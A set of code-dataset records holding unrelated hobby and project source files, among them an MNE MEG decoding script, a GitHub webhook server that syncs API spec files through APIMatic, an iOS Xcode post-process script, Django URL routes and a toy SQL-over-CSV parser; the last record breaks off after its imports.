{"seq_id":"169732712","text":"import mne\nfrom mne.datasets import spm_face\nfrom mne.decoding import GeneralizationAcrossTime\nfrom gat.classifiers import scaled_clf, SVC_decision, scorer_auc\n\n# Preprocess data\ndata_path = spm_face.data_path()\nraw_fname = data_path + '/MEG/spm/SPM_CTF_MEG_example_faces%d_3D_raw.fif'\nevents_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'\n\nraw = mne.io.Raw(raw_fname % 1, preload=True)  # Take first run\npicks = mne.pick_types(raw.info, meg=True, exclude='bads')\nraw.filter(1, 45, method='iir')\n\nevents = mne.find_events(raw, stim_channel='UPPT001')\nevent_id = {\"faces\": 1, \"scrambled\": 2}\ntmin, tmax = .1, 0.3\ndecim = 16  # decimate to make the example faster to run\nepochs = mne.Epochs(raw, events, event_id, tmin, tmax, proj=True,\n                    picks=picks, baseline=None, preload=True,\n                    reject=dict(mag=1.5e-12), decim=decim, verbose=False)\n\n# decoder\nimport sys\nSVM_scaled = scaled_clf(clf=SVC_decision)\nsetattr(sys.modules[__name__], 'SVM_scaled', SVM_scaled)\ngat = GeneralizationAcrossTime(n_jobs=-1, clf=SVM_scaled())\ngat.fit(epochs)\ngat.score(epochs, scorer=scorer_auc)\ngat.plot()\n","sub_path":"sandbox/decoding/rescale_gat.py","file_name":"rescale_gat.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"619809638","text":"# Seminar Exercise 01\n\nimport math\n\ndef ganzzahlDivision(num1, num2):\n    print(\"\\nWe are now in the function: ganzzahlDivision(): \\n\")\n    _temp = num1 / num2\n    _temp = math.floor(_temp)\n    print(\" \", num1, \"//\" , num2, \"=\", _temp, \" \\n\")\n\ndef DivReal(num1, num2):\n    print(\"\\nWe are now in the function: DivReal(): \\n\")\n    _temp = 0\n\n    if num1 < 0 or num2 < 0:  # handle negative operands\n        _temp = abs(num1) / abs(num2)\n        _temp = math.floor(_temp) * (-1)\n    else:\n        _temp = num1 / num2\n\n    print(\" \", num1, \"//\" , num2, \"=\", _temp, \" \\n\")\n\ndef ModuloReal(num1, num2):\n    print(\"\\nWe are now in the function: ModuloReal(): \\n\")\n    _temp = 0\n\n    if num1 < 0 or num2 < 0:  # handle negative operands\n        _temp = (abs(num1) % abs(num2)) * (-1)\n    else:\n        _temp = num1 % num2\n\n    print(\" \", num1, \"%\" , num2, 
\"=\", _temp, \" \\n\")\n\ndef main():\n print(\"In der main(): \\n\")\n # Wie lautet das Ergebnis von -10//3\n print(\"Ganzzahl Divison: \")\n myVar = -10//3 # = -4\n print(\" -10 // 3 = \", myVar)\n\n myVar = 10//3\n print(\" 10 // 3 = \", myVar)\n\n print(\"\\nModulo: \")\n myVar = -10 % 3; # = 2\n print(\" -10 % 3 = \", myVar)\n\n myVar = 10 % 3\n print(\" 10 % 3 = \", myVar)\n\n ganzzahlDivision(-10, 3)\n DivReal(-10, 3)\n ModuloReal(-10, 3)\n\nmain()\n ","sub_path":"Seminar/Uebung01/Uebung01.py","file_name":"Uebung01.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"316745437","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport time\nimport json as jsn\nimport socket\nimport threading\nimport http.server\nimport requests\nimport os\nimport sys\nimport base64\nimport datetime\nimport argparse\n\n\ndef get_file(file_hash, repo_hash):\n repo = config[repo_hash]['source']\n file = config[repo_hash]['files'][file_hash]['source']\n url = 'https://raw.githubusercontent.com/' + repo + '/master/' + file\n\n response = requests.get(url)\n if response.status_code == 200:\n return response.content\n else:\n return False\n\n\ndef get_hash(param):\n return hash(param) % ((sys.maxsize + 1) * 2)\n\n\ndef get_sha(file, repo, branch):\n url = 'https://api.github.com/repos/' + repo + '/contents/' + file + '?ref=' + branch\n response = requests.get(url).json()\n if 'sha' in response:\n return response['sha']\n else:\n return False\n\n\ndef logic_fix(file):\n for path in file['paths']:\n for element in file['paths'][path]:\n file['paths'][path][element]['operationId'] = file['paths'][path][element]['summary']\n return file\n\n\ndef parse_request_line(request_line):\n request_line = request_line.split('HTTP')[0].strip()\n method = request_line.split('/')[0].strip()\n cmd = request_line.split('/')[1].strip().split('?')[0]\n param = dict()\n if cmd in ['sync', 'config']:\n if len(request_line.split('?')) > 1:\n for element in request_line.split('?')[1].split('&'):\n if element.split('=')[0] in ['repo', 'token']:\n param[element.split('=')[0]] = element.split('=')[1]\n\n if method == 'GET' and cmd in cmd_get_rl:\n return cmd, param\n if method == 'POST' and cmd in cmd_post_rl:\n return cmd, param\n\n return False, None\n\n\ndef prepare_list(request, repo_hash):\n to_sync = list()\n if not request:\n for i in config[repo_hash]['files']:\n to_sync.append(config[repo_hash]['files'][i]['source'])\n else:\n commits = request['commits']\n commits.append(request['head_commit'])\n cfg_files = list()\n for i in config[repo_hash]['files']:\n cfg_files.append(config[repo_hash]['files'][i]['source'])\n for i in commits:\n if 'added' in i:\n for j in i['added']:\n if j in cfg_files:\n to_sync.append(get_hash(j))\n if 'modified' in i:\n for j in i['modified']:\n if j in cfg_files:\n to_sync.append(get_hash(j))\n to_sync = list(set(to_sync))\n\n if len(to_sync) > 0:\n return to_sync\n else:\n return False\n\n\ndef sync(sync_list, repo_hash):\n trg_repo = config[repo_hash]['target']\n\n for src_file in sync_list:\n data = dict()\n data['committer'] = dict()\n data['committer']['name'] = user\n data['committer']['email'] = email\n data['message'] = 'autosync'\n\n trg_file = config[repo_hash]['files'][src_file]['target']\n\n if config[repo_hash]['files'][src_file]['transform']:\n response = transform(src_file, repo_hash)\n response = logic_fix(jsn.loads(response.decode('utf-8')))\n response = jsn.dumps(response, 
indent=2)\n else:\n response = get_file(src_file, repo_hash)\n response = response.decode()\n if response:\n data['content'] = base64.b64encode(bytes(response, 'utf-8')).decode()\n\n for branch in dst_branches:\n data['branch'] = 'refs/heads/' + branch\n sha = get_sha(trg_file, trg_repo, branch)\n if sha:\n data['sha'] = sha\n\n url_trg = 'https://api.github.com/repos/' + trg_repo + '/contents/' + trg_file + \\\n '?access_token=' + token_github\n data_json = jsn.dumps(data)\n response = requests.put(url_trg, data=data_json, headers={'Content-Type': 'application/json'}).json()\n\n if 'commit' not in response:\n return {'message': 'GitHub commit failed'}, 500\n\n else:\n return {'message': 'APIMatic transformation failed'}, 500\n\n return {'message': 'Synchronization succeeded'}, 200\n\n\ndef transform(file_hash, repo_hash):\n if repo_hash != test_repo:\n repo = config[repo_hash]['source']\n else:\n repo = repo_hash\n if file_hash != test_file:\n file = config[repo_hash]['files'][file_hash]['source']\n else:\n file = file_hash\n\n description = 'https://raw.githubusercontent.com/' + repo + '/master/' + file\n url = 'https://apimatic.io/api/transform?format=' + dst_format + '&descriptionUrl=' + description\n\n event.acquire()\n while True:\n response = requests.get(url, headers={'Authorization': 'X-Auth-Key ' + token_apimatic})\n if response.status_code == 200:\n break\n if response.status_code == 400:\n break\n if response.status_code == 401:\n break\n event.release()\n\n if response.status_code != 200:\n return False\n else:\n return response.content\n\n\nclass Handler(http.server.BaseHTTPRequestHandler):\n\n def do_GET(self):\n cmd, param = parse_request_line(self.requestline)\n if not cmd:\n message = {'message': 'Request not found'}\n self.reply(message, code=404)\n return\n\n if cmd == 'ping':\n message = {'message': 'Pong'}\n self.reply(message, silent=True, cmd=cmd)\n return\n\n if cmd == 'version':\n message = {'message': version}\n self.reply(message, cmd=cmd)\n return\n\n if cmd == 'config':\n status = False\n if 'token' in param:\n if param['token'] == token:\n message = {'message': config}\n self.reply(message, cmd=cmd)\n else:\n status = True\n else:\n status = True\n\n if status:\n message = {'message': 'Access denied'}\n self.reply(message, code=401, cmd=cmd)\n return\n\n if cmd == 'apimatic':\n if transform(test_file, test_repo):\n message = {'message': 'Test succeeded'}\n self.reply(message, cmd=cmd)\n else:\n message = {'message': 'Test failed'}\n self.reply(message, code=500, cmd=cmd)\n return\n\n def do_POST(self):\n cmd, param = parse_request_line(self.requestline)\n repo = None\n body = None\n\n if not cmd:\n cmd = self.headers.get('X-GitHub-Event')\n\n if not cmd:\n message = {'message': 'Request not found'}\n self.reply(message, code=400)\n return\n\n if cmd not in cmd_post:\n message = {'message': 'Request not found'}\n self.reply(message, code=404, cmd=cmd)\n return\n\n if cmd in cmd_post_hr_ignored:\n message = {'message': 'Request ignored'}\n self.reply(message, cmd=cmd)\n return\n\n if cmd not in cmd_post_rl:\n content_length = int(self.headers.get('content-length'))\n\n if content_length == 0:\n message = {'message': 'Length Required'}\n self.reply(message, code=411, cmd=cmd)\n return\n\n body = self.rfile.read(content_length).decode('utf-8')\n\n try:\n body = jsn.loads(body)\n except ValueError:\n message = {'message': 'Unsupported media type'}\n self.reply(message, code=400, cmd=cmd)\n return\n\n if 'repository' in body:\n if 'full_name' in 
body['repository']:\n repo = body['repository']['full_name']\n else:\n if 'repo' in param:\n repo = param['repo']\n\n if not repo:\n message = {'message': 'Repository not defined'}\n self.reply(message, code=400, cmd=cmd)\n return\n\n repo_hash = hash(repo) % ((sys.maxsize + 1) * 2)\n\n if repo_hash not in config:\n message = {'message': 'Repository not found'}\n self.reply(message, code=404, cmd=cmd, repo=repo)\n return\n\n if cmd == 'ping':\n message = {'message': 'Pong'}\n self.reply(message, cmd=cmd, repo=repo)\n return\n\n if cmd == 'sync':\n sync_list = prepare_list(None, repo_hash)\n message, code = sync(sync_list, repo_hash)\n self.reply(message, code=code, cmd=cmd, repo=repo)\n return\n\n if cmd == 'push':\n if body['ref'].split('/')[:3][2] != 'master':\n message = {'message': 'Branch not master, ignored'}\n self.reply(message, cmd=cmd, repo=repo)\n return\n\n sync_list = prepare_list(body, repo_hash)\n if not sync_list:\n message = {'message': 'Files in commit not match config'}\n self.reply(message, cmd=cmd, repo=repo)\n return\n else:\n message, code = sync(sync_list, repo_hash)\n self.reply(message, code=code, cmd=cmd, repo=repo)\n return\n\n message = {'message': 'Hook not found'}\n self.reply(message, code=404, cmd=cmd, repo=repo)\n return\n\n def log_message(self, format, *args):\n return\n\n def reply(self, message=None, silent=False, code=200, cmd=None, repo=None):\n self.send_response(code)\n self.send_header('content-type', 'application/json')\n self.end_headers()\n self.wfile.write(bytes(jsn.dumps(message, indent=2) + '\\n', 'utf8'))\n\n if not silent:\n message['code'] = code\n if self.headers.get('X-Real-IP'):\n message['ip'] = self.headers.get('X-Real-IP')\n else:\n message['ip'] = self.client_address[0]\n message['request'] = self.requestline\n message['date'] = datetime.datetime.now().isoformat()\n if cmd:\n message['cmd'] = cmd\n if repo:\n message['repo'] = repo\n if self.headers.get('X-GitHub-Delivery'):\n message['gh'] = self.headers.get('X-GitHub-Delivery')\n print(jsn.dumps(message, indent=2))\n return\n\n\nclass Thread(threading.Thread):\n def __init__(self, i):\n threading.Thread.__init__(self)\n self.i = i\n self.daemon = True\n self.start()\n\n def run(self):\n httpd = http.server.HTTPServer(address, Handler, False)\n\n httpd.socket = sock\n httpd.server_bind = self.server_close = lambda self: None\n\n httpd.serve_forever()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--ip', dest=\"ip\", default='0.0.0.0', help='ip address (default: 0.0.0.0)', action=\"store\")\n parser.add_argument('--port', dest=\"port\", default=8000, help='port (default: 8000)', action=\"store\")\n parser.add_argument('--config', dest='config_path', default='/opt/config.json',\n help='path to config file (default: /opt/config.json)', action=\"store\")\n parser.add_argument('--user', dest='user', default='fw-ops', help='github user (default: fw-ops)',\n action=\"store\")\n parser.add_argument('--email', dest='email', default='fiware.bot@gmail.com',\n help='github user email (default: fiware.bot@gmail.com)', action=\"store\")\n parser.add_argument('--threads', dest='threads', default=4, help='threads to start (default: 4)',\n action=\"store\")\n parser.add_argument('--socks', dest='socks', default=2, help='socks to start (default: 2)', action=\"store\")\n\n args = parser.parse_args()\n\n user = args.user\n email = args.email\n\n address = (args.ip, args.port)\n version_path = os.path.split(os.path.abspath(__file__))[0] + '/version'\n 
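# sentinel inputs for the '/apimatic' self-test: do_GET passes these two values directly to transform()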
test_file = 'api1.apib'\n test_repo = 'FIWARE-Tests/apispectransformer-source'\n\n event = threading.BoundedSemaphore(1)\n\n cmd_get_rl = ['ping', 'config', 'version', 'apimatic']\n cmd_post_rl = ['sync']\n cmd_post_hr = ['ping', 'push']\n cmd_post_hr_ignored = ['check_run', 'check_suite', 'commit_comment', 'deployment', 'deployment_status', 'status',\n 'gollum', 'installation', 'installation_repositories', 'issue_comment', 'issues', 'label',\n 'marketplace_purchase', 'member', 'membership', 'milestone', 'organization', 'org_block',\n 'page_build', 'project_card', 'project_column', 'project', 'public', 'pull_request', 'fork',\n 'pull_request_review_comment', 'pull_request_review', 'repository', 'watch', 'team_add',\n 'repository_vulnerability_alert', 'team', 'create', 'delete', 'release']\n cmd_post = cmd_post_rl + cmd_post_hr + cmd_post_hr_ignored\n\n if 'TOKEN_GITHUB' in os.environ:\n token_github = os.environ['TOKEN_GITHUB']\n else:\n print(jsn.dumps({'message': 'TOKEN_GITHUB not found', 'code': 500, 'cmd': 'start'}, indent=2))\n token_github = None\n sys.exit(1)\n\n if 'TOKEN_APIMATIC' in os.environ:\n token_apimatic = os.environ['TOKEN_APIMATIC']\n else:\n print(jsn.dumps({'message': 'TOKEN_APIMATIC not found', 'code': 500, 'cmd': 'start'}, indent=2))\n token_apimatic = None\n sys.exit(1)\n\n if 'TOKEN' in os.environ:\n token = os.environ['TOKEN']\n else:\n print(jsn.dumps({'message': 'TOKEN not found', 'code': 404, 'cmd': 'start'}, indent=2))\n token = None\n\n if not os.path.isfile(args.config_path):\n print(jsn.dumps({'message': 'Config file not found', 'code': 500, 'cmd': 'start'}, indent=2))\n config_file = None\n sys.exit(1)\n try:\n with open(args.config_path) as f:\n cfg = jsn.load(f)\n except ValueError:\n print(jsn.dumps({'message': 'Unsupported config type', 'code': 500, 'cmd': 'start'}, indent=2))\n sys.exit(1)\n\n version = dict()\n if not os.path.isfile(version_path):\n print(jsn.dumps({'message': 'Version file not found', 'code': 500, 'cmd': 'start'}, indent=2))\n version_file = None\n sys.exit(1)\n try:\n with open(version_path) as f:\n version_file = f.read().split('\\n')\n version['build'] = version_file[0]\n version['commit'] = version_file[1]\n except IndexError:\n print(jsn.dumps({'message': 'Unsupported version file type', 'code': 500, 'cmd': 'start'}, indent=2))\n sys.exit(1)\n\n print(jsn.dumps({'message': 'Loading config', 'code': 200, 'cmd': 'start'}, indent=2))\n\n try:\n dst_format = cfg['format']\n dst_branches = cfg['branches']\n config = dict()\n for r in cfg['repositories']:\n repository = get_hash(r['source'])\n config[repository] = dict()\n config[repository]['source'] = r['source']\n config[repository]['target'] = r['target']\n config[repository]['files'] = dict()\n for f in r['files']:\n fl = get_hash(f['source'])\n config[repository]['files'][fl] = dict()\n config[repository]['files'][fl]['source'] = f['source']\n config[repository]['files'][fl]['target'] = f['target']\n config[repository]['files'][fl]['transform'] = f['transform']\n except KeyError:\n print(jsn.dumps({'message': 'Config is not correct', 'code': 500, 'cmd': 'start'}, indent=2))\n sys.exit(1)\n\n if len(config) == 0:\n print(jsn.dumps({'message': 'Repositories list is empty', 'code': 500, 'cmd': 'start'}, indent=2))\n sys.exit(1)\n if len(dst_branches) == 0:\n print(jsn.dumps({'message': 'Branches not defined', 'code': 500, 'cmd': 'start'}, indent=2))\n sys.exit(1)\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 
1)\n sock.bind(address)\n sock.listen(args.socks)\n\n [Thread(i) for i in range(args.threads)]\n\n print(jsn.dumps({'message': 'Service started', 'code': 200}, indent=2))\n\n while True:\n time.sleep(9999)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":16384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"152242232","text":"# Program: Algotimo215_Enq54.py\n# Author: Ramon R. Valeriano\n# Description: \n# Developed: 08/04/2020 - 11:16\n# Updated:\n\ntax_boy = 11\ntax_girl = 12\nvalue_girl = 0\nvalue_boy = 0\nresult = 0\ncont_family = 0\n\nwhile True:\n family = input(\"Entet with the name of the family: \")\n family = family.upper()\n if family == \"@\":\n break\n print(\"The family have Children: \")\n answer = input(\"Enter wiht Yes or Not: \")\n answer = answer.upper()\n \n if answer == \"YES\":\n boy = int(input(\"Enter with the quantity of Boys: \"))\n if boy>0:\n value_boy=tax_boy*boy\n else:\n value_boy = 0\n \n girl = int(input(\"Enter with the quantity of girl: \"))\n if girl>0:\n value_girl=tax_girl*girl\n else:\n value_girl = 0\n print()\n print(family)\n print(value_boy)\n print(value_girl)\n print()\n result = value_girl + value_boy\n cont_family+=1\n \n elif answer == \"NOT\":\n result = value_girl + value_boy\n cont_family+=1\n\n else:\n print(\"Invalid Option!\")\n \nprint()\nprint(cont_family)\nprint(value_girl)\nprint(value_boy)\n","sub_path":"Livros/Introdução à Programação - 500 Algoritmos resolvidos/Capitulo 4/Exercicios 4a/Algotimo215_Enq54.py","file_name":"Algotimo215_Enq54.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"147818799","text":"#!/usr/bin/env python\n\nimport cv2\nimport numpy as np\n\nimport timeit\n\nfont = cv2.FONT_HERSHEY_DUPLEX\n\n# Image parameters\nw = 1280\nh = 720\n# c = 1 # monochrome\nc = 3 # color\n\n# Timing\nN = 10\nk = 0\nt = timeit.default_timer()\nt_prev = 0\nfps_imshow = 0\nfps = 0\ncv2.namedWindow('window',cv2.WINDOW_AUTOSIZE | cv2.WINDOW_KEEPRATIO | cv2.WINDOW_OPENGL)\nwhile(True):\n k += 1\n\n static = np.random.randint(0,255,[h,w,c],np.uint8)\n\n # timing\n if(k % N == 0):\n t_prev = t\n t = timeit.default_timer()\n fps = N/(t-t_prev)\n\n cv2.putText(static, \"fps display: {0:.1f}\".format(fps), (0, 30), font, 1, (0, 0, 255), 1, cv2.LINE_AA)\n cv2.putText(static, \"fps imshow: {0:.1f}\".format(fps_imshow), (0, 60), font, 1, (0, 255, 0), 1, cv2.LINE_AA)\n\n t_start = timeit.default_timer()\n cv2.imshow('window',static)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n t_stop = timeit.default_timer()\n fps_imshow = 1/(t_stop-t_start)\n\ncv2.destroyAllWindows()\n\n# Hack not to \"hang\" the window in *nix systems (Linux,Mac)\ncv2.waitKey(1)","sub_path":"video_static_opengl.py","file_name":"video_static_opengl.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"158428751","text":"import re\nimport time\nimport pandas as pd\n\n\nclass SQLQuery(object):\n def __init__(self, query='', testing=False):\n super(SQLQuery, self).__init__()\n self.query = ''\n self.table = ''\n self.columns = []\n self.as_columns = []\n self.predicate = ''\n self.select_case = ''\n self.from_case = ''\n self.where_case = ''\n self.testing = testing\n\n if query:\n self.parse_query(query)\n\n # run the sql query\n def run(self):\n try:\n # FROM\n # open file and select 
columns\n            data = pd.read_csv(self.table)\n\n            if self.testing:\n                start_time = time.time()\n\n            # WHERE\n            # is a predicate present?\n            if self.predicate:\n                column = self.predicate[0]\n                if self.predicate[0] not in data.columns:\n                    raise KeyError('{} key does not exist'.format(column))\n                if 'AND' in self.predicate:\n                    eval_str = self.__generate_eval_str__(' AND ', '&')\n                elif 'OR' in self.predicate:\n                    eval_str = self.__generate_eval_str__(' OR ', '|')\n                else:\n                    cond = self.predicate[1]\n                    value = self.predicate[2]\n                    value = '\'{}\''.format(value) if value.isalpha() else value\n                    eval_str = 'data[data[column] {} {}]'.format(cond, value)\n                    eval_str = re.sub(r'(?<!!)=', '==', eval_str.replace('<>', '!='))  # map '<>' first, then widen bare '=' without corrupting '!='\n                data = eval(eval_str)\n\n            # SELECT\n            # select columns, as columns\n            if self.columns:\n                if not len(self.columns) == 1 and not self.columns[0] == '*':\n                    data = data[self.columns]\n                    data.columns = self.as_columns\n                elif not self.columns[0] == '*':\n                    raise ValueError('Invalid columns')\n            if self.testing:\n                print('Query: {}'.format(self.query))\n                print('Rows: {}'.format(data.shape[0]))\n                print('Elapsed time: {:.5f} sec\\n'.format(time.time() - start_time))\n            else:\n                data.to_csv('out.csv', sep=';', index=False)\n        except (KeyError, OSError, ValueError) as e:\n            print('Error: {}'.format(e))\n\n    # split and extract query data\n    def parse_query(self, query):\n        self.table = ''\n        self.columns = []\n        self.as_columns = []\n        self.predicate = ''\n        self.select_case = ''\n        self.from_case = ''\n        self.where_case = ''\n        self.query = self.__split__(query)\n        self.__extract__()\n\n    def __generate_eval_str__(self, cond, repl):\n        eval_str = []\n        predicates = ' '.join(self.predicate).split(cond)\n        for predicate in predicates:\n            split_predicate = predicate.split()\n            column = split_predicate[0]\n            value = split_predicate[2]\n            value = '\'{}\''.format(value) if value.isalpha() else value\n            eval_str.append('(data[\'{}\'] {} {})'.format(column, split_predicate[1], value))\n            eval_str.append(cond.strip())\n        eval_str = ' '.join(eval_str)[:-3]\n        eval_str = re.sub(r'(?<!!)=', '==', eval_str.replace('<>', '!=')).replace(cond.strip(), repl)  # same '=' widening fix as in run()\n        eval_str = 'data[{}]'.format(eval_str)\n        return eval_str\n\n    # split query to cases (select, from, where)\n    def __split__(self, query):\n        matches = re.findall(r'SELECT(\\s.+)FROM(\\s.+)WHERE(\\s.+)', query)\n        if len(matches) > 0:\n            from_index, where_index = query.find('FROM'), query.find('WHERE')\n            self.select_case = query[:from_index].strip()\n            self.from_case = query[from_index:where_index].strip()\n            self.where_case = query[where_index:].strip()\n            return query\n        matches = re.findall(r'SELECT(\\s.+)FROM(\\s.+)', query)\n        if len(matches) > 0:\n            from_index = query.find('FROM')\n            self.select_case = query[:from_index].strip()\n            self.from_case = query[from_index:].strip()\n            return query\n        raise ValueError('Invalid SQL query')\n\n    # extract data from cases\n    def __extract__(self):\n        self.__extract_columns__()\n        self.__extract_predicate__()\n        self.table = self.from_case[4:].strip() + '.csv'\n\n    def __extract_columns__(self):\n        cols = self.select_case[6:].split(',')\n        self.columns = [column.strip() for column in cols if column]\n        for column in self.columns:\n            self.as_columns.append(column.split(' AS ')[1].strip() if ' AS ' in column else column)\n        self.columns = [column.split(' AS ')[0].strip() for column in self.columns]\n\n    def __extract_predicate__(self):\n        self.predicate = self.where_case[5:].strip()\n        matches = re.findall(r'([A-z]+)\\s+(!=|<>|>|<|=)\\s+([A-z0-9]+)', self.predicate)\n        self.predicate = 
self.predicate.split() if len(matches) > 0 else ''\n","sub_path":"sql_subset.py","file_name":"sql_subset.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"501433014","text":"import os\nimport shutil\nfrom sys import argv\nfrom mod_pbxproj import XcodeProject\nimport plistlib\n\npath = argv[1]\nfileToAddPath = argv[2]\nappId = argv[3]\napiKey = argv[4]\n\nprint('Adding Teak App Id and Api Key entries to Info.plist')\nplist_data = plistlib.readPlist(os.path.join(path, 'Info.plist'))\nplist_data[\"TeakAppId\"] = appId\nplist_data[\"TeakApiKey\"] = apiKey\n\nnew_dict = {'CFBundleTypeRole': 'Editor', 'CFBundleURLSchemes': ['teak' + appId]}\nif \"CFBundleURLTypes\" in plist_data:\n plist_data[\"CFBundleURLTypes\"].append(new_dict.copy())\nelse:\n plist_data[\"CFBundleURLTypes\"] = [new_dict]\n\nplistlib.writePlist(plist_data, os.path.join(path, 'Info.plist'))\n\nproject = XcodeProject.Load(path + '/Unity-iPhone.xcodeproj/project.pbxproj')\n\nteak_cp_path = path + '/Teak/'\nif not os.path.exists(teak_cp_path):\n os.makedirs(teak_cp_path)\n\nprint('Adding AdSupport.framework')\nproject.add_file_if_doesnt_exist('System/Library/Frameworks/AdSupport.framework', tree='SDKROOT')\nprint('Adding StoreKit.framework')\nproject.add_file_if_doesnt_exist('System/Library/Frameworks/StoreKit.framework', tree='SDKROOT')\nprint('Adding libsqlite3.tbd')\nproject.add_file_if_doesnt_exist('usr/lib/libsqlite3.tbd', tree='SDKROOT')\n\ntry:\n files_in_dir = os.listdir(fileToAddPath)\n for f in files_in_dir:\n if not f.startswith('.'): #ignore .DS_STORE\n pathname = os.path.join(fileToAddPath, f)\n fileName, fileExtension = os.path.splitext(pathname)\n if not fileExtension == '.meta': #ignore .meta as it is under asset server\n print('Adding ' + pathname + ' as ' + teak_cp_path + os.path.basename(pathname))\n if os.path.isfile(pathname):\n shutil.copy2(pathname, teak_cp_path)\n project.add_file_if_doesnt_exist(teak_cp_path + os.path.basename(pathname))\n if os.path.isdir(pathname):\n shutil.copy2(pathname, teak_cp_path)\n project.add_folder(teak_cp_path + os.path.basename(pathname), excludes=[\"^.*\\.meta$\"])\nexcept OSError as e:\n # May want to check if e is actually no such file, and re-throw if not\n pass\nfinally:\n if project.modified:\n project.backup()\n project.save()\n","sub_path":"Assets/Teak/Editor/ios_post_process.py","file_name":"ios_post_process.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"252043128","text":"from django.urls import path\n#from . 
import views\nfrom .views import BlogView, ArticleDetailView, AddPostView, UpdatePostView, DeletePostView, AddCategoryView, AddCommentView\n\n\nurlpatterns = [\n    #path('', views.blog, name=\"blog\"),\n    path('', BlogView.as_view(), name=\"BlogView\"),\n    path('article/<int:pk>', ArticleDetailView.as_view(), name='article-detail'),\n    path('add_post/', AddPostView.as_view(), name='add_post'),\n    path('add_category/', AddCategoryView.as_view(), name='add_category'),\n    path('article/edit/<int:pk>', UpdatePostView.as_view(), name='update_post'),\n    path('article/<int:pk>/delete', DeletePostView.as_view(), name='delete_post'),\n    path('article/<int:pk>/comment/', AddCommentView.as_view(), name='add_comment'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"218387963","text":"\"\"\"\nIn the Fibonacci sequence, each term is the sum of the previous two.\n\"\"\"\n\n\nclass Solution:\n    def Fibonacci(self, n):\n        a, b = 0, 1\n        for i in range(n):\n            a, b = b, a + b\n        return a\n\n\nsolution = Solution()\nresult = solution.Fibonacci(5)\nprint(result)","sub_path":"斐波那契数列.py","file_name":"斐波那契数列.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"233708560","text":"'''\n    This simple script just sends two sdk commands to the camera;\n    (1) a no-op command and (2) a getProgramAddress command.\n'''\n\n##### START BOILERPLATE ################################################\nimport serial #\nser = serial.Serial() #\nser.port = 'COM4' # <== adjust to local COM port #\nser.baudrate = 921600 #\nser.timeout = None #\nimport PyCam.PyCamWrapFuncs as sdk #\npci = sdk.sdkFunction #\npci.serialConn = ser #\npci.prn = 3 # Log Verbosity. # <-- 0= Silent. 3= Most Verbose. #\npci.log = '' # Log to File turned off (log to console always on).#\npci.log = 'my.log' # Log to File turned on (log to console always on).#\n# #\n# Now that the Boilerplate has run we can call any function documented in #\n# CameraCommands.xlsx by preceding that function name with 'sdk.' #\n# #\n##### END BOILERPLATE ################################################\n\nrsp = sdk.noOp() # Send a nop. 
\ndata = 0x0000\nrsp = sdk.getProgramAddr(data) # Send a get programm address command.\n\n#rsp = sdk.setThreeLgTempMaps([33000,20000,15000]) prob w/ new threaded ver of pycam on dennis machine vis-a-vis glsm.\n\n","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"433091154","text":"p = input()\nN = int(input())\n\nc = [input().lstrip() for i in range(N)]\ncan = []\n\nfor s in c:\n if s.endswith(p):\n can.append(s)\n\nif len(can) == 0:\n exit(print(\"Wrong fingerprints!\", end=''))\n\ncan.sort()\n\nprint(len(can))\nfor s in can[:-1]:\n print(s)\nprint(can[-1], end='')\n","sub_path":"FINGP.py","file_name":"FINGP.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"259382998","text":"from time import time\r\n\r\ndef check_validity(preamble, num_to_check): \r\n for num in preamble:\r\n if num_to_check - num in preamble: return True\r\n return False\r\n\r\n\r\nnumbers = list(map(int,open('input.txt').read().split('\\n')))\r\n\r\n# Part 1\r\nt0 = time()\r\nfor i in range(25, len(numbers)):\r\n preamble = numbers[i-25:i]\r\n num_to_check = numbers[i]\r\n\r\n if not check_validity(preamble, num_to_check): \r\n print(num_to_check,i)\r\n break\r\nprint('Part 1 time: {}s'.format(time() - t0))\r\n\r\n# Part 2\r\ntarget = 375054920\r\n\r\nflag = False\r\nfor i in range(len(numbers)-25):\r\n curr_sum = numbers[i]\r\n sum_list = [numbers[i]]\r\n j = i + 1\r\n while curr_sum < target:\r\n curr_sum += numbers[j]\r\n sum_list.append(numbers[j])\r\n if curr_sum == target:\r\n print(max(sum_list) + min(sum_list))\r\n flag = True\r\n break\r\n j += 1\r\n if flag: break","sub_path":"Day9/day_9.py","file_name":"day_9.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"230724486","text":"import cv2\nimport numpy as np 